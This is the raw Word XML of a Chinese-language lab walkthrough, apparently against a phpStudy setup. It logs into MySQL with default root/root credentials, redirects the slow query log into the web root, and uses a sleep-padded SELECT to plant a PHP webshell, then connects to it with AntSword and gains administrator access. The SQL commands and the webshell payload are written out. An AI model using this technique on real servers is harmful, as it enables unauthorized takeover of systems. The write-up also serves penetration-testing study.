          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r w:rsidR="006E7889">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="006E7889">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>站点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0611E727" w14:textId="3E5A1968" w:rsidR="006E7889" w:rsidRPr="004226D9" w:rsidRDefault="004226D9" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="218D709E" wp14:editId="2A5CC289">
            <wp:extent cx="5274310" cy="1069975"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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7923" w14:textId="3601A7A1" w:rsidR="006E7889" w:rsidRDefault="004226D9" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00707E36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试</w:t>
      </w:r>
      <w:r w:rsidR="00707E36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidR="00707E36">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00707E36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidR="00707E36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号密码来登录</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00707E36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0F2ED1BB" w14:textId="3FC1C8AA" w:rsidR="00707E36" w:rsidRDefault="004226D9" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59ED7EE4" wp14:editId="239900D6">
            <wp:extent cx="5274310" cy="803910"/>
            <wp:effectExtent l="0" t="0" r="2540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0112" w14:textId="7E2E598B" w:rsidR="004226D9" w:rsidRDefault="004226D9" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功连接，开始找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管理页面路径；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532E35FC" w14:textId="77777777" w:rsidR="004226D9" w:rsidRDefault="004226D9" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7052D178" w14:textId="71180FFA" w:rsidR="00707E36" w:rsidRDefault="00A131A9" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidR="00707E36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4329E753" w14:textId="77777777" w:rsidR="00A131A9" w:rsidRDefault="00A131A9" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12AF1E77" w14:textId="55380A50" w:rsidR="00707E36" w:rsidRDefault="00707E36" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61F08F87" wp14:editId="350B1552">
            <wp:extent cx="5274310" cy="1242695"/>
            <wp:effectExtent l="0" t="0" r="2540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FC2C" w14:textId="3A19B564" w:rsidR="00707E36" w:rsidRDefault="00A131A9" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00707E36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录数据库管理界面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361F7A16" w14:textId="0C7BD76E" w:rsidR="00707E36" w:rsidRDefault="00A131A9" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="060445A5" wp14:editId="69059380">
            <wp:extent cx="5274310" cy="873760"/>
            <wp:effectExtent l="0" t="0" r="2540" b="254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D31" w14:textId="7DECDE20" w:rsidR="00707E36" w:rsidRDefault="00707E36" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试通过写文件或者日志来写入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7278154D" w14:textId="45D716F9" w:rsidR="00707E36" w:rsidRDefault="00707E36" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00204343">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看写文件的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前提条件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094FAC2C" w14:textId="2FC1C0C2" w:rsidR="00707E36" w:rsidRDefault="00B72D63" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B72D63">
        <w:t>SHOW GLOBAL VARIABLES LIKE "%secure%"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CF4239" w14:textId="370C8FEB" w:rsidR="00707E36" w:rsidRDefault="00707E36" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E23A59D" wp14:editId="6AB686E6">
            <wp:extent cx="5274310" cy="886460"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1" name="图片 1" descr="背景图案, 矩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背景图案, 矩形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021C" w14:textId="45A724CA" w:rsidR="00B72D63" w:rsidRDefault="00B72D63" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，说明</w:t>
      </w:r>
      <w:r w:rsidR="00437ABE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00437ABE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是不</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以写文件</w:t>
      </w:r>
      <w:r w:rsidR="00437ABE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D58BF9" w14:textId="7B93B7E9" w:rsidR="00437ABE" w:rsidRDefault="00DA20DA" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看慢日志设置的阈值时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0365EB" w14:textId="667D2E02" w:rsidR="00DA20DA" w:rsidRDefault="00DA20DA" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA20DA">
        <w:t>show global variables like '%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA20DA">
        <w:t>long_query_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA20DA">
        <w:t>%'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5AE1F5" w14:textId="1F2414AB" w:rsidR="00DA20DA" w:rsidRDefault="00DA20DA" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26818AA3" wp14:editId="012488AE">
            <wp:extent cx="5274310" cy="6508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986C" w14:textId="6D203EDA" w:rsidR="00DA20DA" w:rsidRDefault="00DA20DA" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阈值时间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，说明当</w:t>
      </w:r>
      <w:r w:rsidR="00EB0AEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>某个语句查询</w:t>
      </w:r>
      <w:r w:rsidR="000C679C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时间超过</w:t>
      </w:r>
      <w:r w:rsidR="000C679C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="000C679C">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="000C679C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>秒后，会将这个查询语句写入慢日志中；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091815D4" w14:textId="673C705A" w:rsidR="000C679C" w:rsidRDefault="00BB21B9" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C77AB8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启慢日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3865980B" w14:textId="67789F10" w:rsidR="00C77AB8" w:rsidRDefault="00C77AB8" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>set global</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>low_query_log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197B06C6" w14:textId="54CB5B9B" w:rsidR="00C77AB8" w:rsidRDefault="00C77AB8" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03A00B0F" wp14:editId="44539015">
            <wp:extent cx="5274310" cy="690245"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="11" name="图片 11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背景图案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2B51" w14:textId="145A05DC" w:rsidR="00C77AB8" w:rsidRDefault="00C77AB8" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="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在探针页面可以看到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的探针</w:t>
      </w:r>
      <w:r w:rsidR="00BD4BCE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绝对路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9F8610" w14:textId="52B7F37F" w:rsidR="00BD4BCE" w:rsidRDefault="00BD4BCE" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AB1564F" wp14:editId="45290BD6">
            <wp:extent cx="5274310" cy="1313180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="127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868" w14:textId="685F0179" w:rsidR="00BD4BCE" w:rsidRDefault="00BD4BCE" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>C:/phpStudy/WWW/l.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC87BF1" w14:textId="2ACD863C" w:rsidR="00BD4BCE" w:rsidRDefault="00BD4BCE" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0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设置存放慢日志的文件为我们在绝对路径下创建的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A36A5D" w14:textId="5EF3E1EC" w:rsidR="00BD4BCE" w:rsidRDefault="00BD4BCE" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>C:/phpStudy/WWW/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2F07FB" w14:textId="4A1C39FD" w:rsidR="00BD4BCE" w:rsidRDefault="00BD4BCE" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pP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global</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00515E3A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>slow</w:t>
      </w:r>
      <w:r w:rsidR="00515E3A">
        <w:t>_query_log_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00515E3A">
        <w:t xml:space="preserve"> =</w:t>
      </w:r>
      <w:r w:rsidR="00515E3A" w:rsidRPr="00515E3A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00515E3A">
        <w:t>“C:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00515E3A">
        <w:t>phpStudy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00515E3A">
        <w:t>/WWW/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00515E3A">
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00515E3A">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E97C0C" w14:textId="4A6DC7A8" w:rsidR="00515E3A" w:rsidRDefault="00515E3A" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65884158" wp14:editId="64707CBA">
            <wp:extent cx="5274310" cy="727075"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14" name="图片 14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背景图案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5AEF" w14:textId="2295144C" w:rsidR="00515E3A" w:rsidRDefault="00515E3A" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C387456" w14:textId="7E81B05C" w:rsidR="00515E3A" w:rsidRDefault="00515E3A" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看是否真的设置成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5057B594" w14:textId="53294962" w:rsidR="00515E3A" w:rsidRDefault="00515E3A" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>show</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D26CCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>variables</w:t>
      </w:r>
      <w:r w:rsidR="00D26CCA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D26CCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>like</w:t>
      </w:r>
      <w:r w:rsidR="00D26CCA">
        <w:t xml:space="preserve"> “%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D26CCA">
        <w:t>slow_query_log_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D26CCA">
        <w:t>%”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576EB44D" w14:textId="52E6A3F8" w:rsidR="00515E3A" w:rsidRDefault="00D26CCA" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="714C533E" wp14:editId="2C22ECE4">
            <wp:extent cx="5274310" cy="6318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4352" w14:textId="3499737E" w:rsidR="00D26CCA" w:rsidRDefault="00D26CCA" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF06D41" w14:textId="0B9C5792" w:rsidR="00D26CCA" w:rsidRDefault="00D26CCA" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07D82062" w14:textId="32A7DDF7" w:rsidR="00D26CCA" w:rsidRDefault="00D26CCA" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0028120A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造查询时间超过</w:t>
      </w:r>
      <w:r w:rsidR="0028120A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="0028120A">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="0028120A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="0028120A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0028120A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0028120A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFB291D" w14:textId="49DA54CB" w:rsidR="0028120A" w:rsidRDefault="0028120A" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0028120A">
        <w:t>select '&lt;?php @evil($_POST["lzk"])</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0028120A">
        <w:t>; ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0028120A">
        <w:t>&gt;' or sleep(1</w:t>
      </w:r>
      <w:r w:rsidR="00EF23DF">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="0028120A">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07492EE2" w14:textId="012B06C9" w:rsidR="0028120A" w:rsidRDefault="00EF23DF" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AB0054A" wp14:editId="3D951049">
            <wp:extent cx="5274310" cy="1023620"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="18" name="图片 18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包含 图形用户界面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252C" w14:textId="66687066" w:rsidR="0028120A" w:rsidRDefault="00EF23DF" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FACEBFE" wp14:editId="7C2E2459">
            <wp:extent cx="5274310" cy="1515745"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="19" name="图片 19" descr="背景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背景图案&#10;&#10;中度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0EA5" w14:textId="1013DE91" w:rsidR="0028120A" w:rsidRDefault="0028120A" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0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访问</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell.</w:t>
      </w:r>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="654E2875" w14:textId="2BED409B" w:rsidR="0028120A" w:rsidRDefault="00EF23DF" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B4BE994" wp14:editId="356CD9D3">
            <wp:extent cx="5274310" cy="2603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A48F" w14:textId="7B808DFB" w:rsidR="00EF23DF" w:rsidRDefault="00EF23DF" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功写入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:t>.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并被解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD3DBA2" w14:textId="139D9CA9" w:rsidR="00EF23DF" w:rsidRDefault="00EF23DF" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="208FCBD3" w14:textId="544E39AA" w:rsidR="00EF23DF" w:rsidRDefault="00EF23DF" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用蚁剑连接</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58070440" w14:textId="7DD3066C" w:rsidR="00EF23DF" w:rsidRDefault="00EF23DF" w:rsidP="0068202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971B605" wp14:editId="4DBADF76">
            <wp:extent cx="5272178" cy="1268233"/>
            <wp:effectExtent l="0" t="0" r="5080" b="8255"/>
            <wp:docPr id="22" name="图片 2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表格&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId21"/>
                    <a:srcRect t="16271" b="10595"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="126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4769" w14:textId="45AF0972" w:rsidR="009904AD" w:rsidRDefault="009904AD" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="015E8D0B" wp14:editId="20ADC6C4">
            <wp:extent cx="5274310" cy="4667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4716" w14:textId="09A145B7" w:rsidR="00810C9F" w:rsidRDefault="00810C9F" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现是管理员权限；</w:t>
      </w:r>
    </w:p>
